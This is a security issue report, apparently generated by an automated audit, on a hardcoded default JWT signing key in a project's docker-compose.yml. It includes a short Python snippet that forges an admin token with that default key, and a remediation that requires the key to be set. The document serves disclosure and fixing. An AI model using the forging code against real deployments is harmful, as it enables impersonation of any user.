[SECURITY] Remove default SECRET_KEY - JWT forgery vulnerability #135
Description
Summary
This issue was identified by an automated security audit run by Claude.
Severity: CRITICAL (P0)
Description
The application has a hardcoded default SECRET_KEY that is used for JWT token signing. If deployed without changing this default, attackers can forge valid JWT tokens.
Location: docker-compose.yml (line 71)
SECRET_KEY=${SECRET_KEY:-claudex_default_secret_key_for_development_only}Attack Scenario
An attacker knowing the default secret key can forge valid authentication tokens:
import jwt
from datetime import datetime, timedelta
forged_token = jwt.encode(
{
"sub": "admin-user-uuid-here", # Any user ID
"aud": ["fastapi-users:auth"],
"exp": datetime.utcnow() + timedelta(days=365)
},
"claudex_default_secret_key_for_development_only",
algorithm="HS256"
)
# This token is now valid and grants access as any userRemediation
Remove the default value and require explicit configuration:
# docker-compose.yml
SECRET_KEY=${SECRET_KEY:?SECRET_KEY must be set}This will cause the application to fail to start if SECRET_KEY is not explicitly set, preventing accidental deployment with insecure defaults.
Risk if Unfixed
Complete authentication bypass - attackers can impersonate any user including administrators.
🤖 This issue was identified by an automated security audit run by Claude.